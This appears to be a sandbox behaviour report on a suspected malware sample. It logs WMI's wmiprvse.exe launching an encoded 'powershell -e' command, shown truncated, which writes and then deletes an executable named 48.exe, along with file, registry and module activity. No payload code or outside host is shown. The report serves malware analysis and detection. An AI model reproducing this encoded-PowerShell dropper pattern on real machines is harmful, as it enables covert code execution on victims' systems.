Process #4: wmiprvse.exe
Information Value
ID #4
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:10, Reason: RPC Server
Unmonitor End Time: 00:04:15, Reason: Self Terminated
Monitor Duration 00:03:04
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xadc
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
Process #5: powershell.exe
Information Value
ID #5
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line Truncated command line: powershell -e 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...
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: Child Process
Unmonitor End Time: 00:01:38, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
Information Value
PID 0xb08
Parent PID 0xadc (c:\windows\system32\wbem\wmiprvse.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
Host Behavior
File (246)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\48.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\48.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 4
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 5
Fn
Get Info - type = file_type True 3
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Windows\system32 type = file_attributes True 7
Fn
Get Info C:\Windows type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_type True 8
Fn
Get Info C:\Users\aETAdzjz\48.exe type = file_attributes True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 44
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 11
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 67
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 3
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read - size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 5
Fn
Data
Write C:\Users\aETAdzjz\48.exe size = 1492 True 1
Fn
Data
Delete C:\Users\aETAdzjz\48.exe - True 4
Fn
Registry (211)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (4)
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
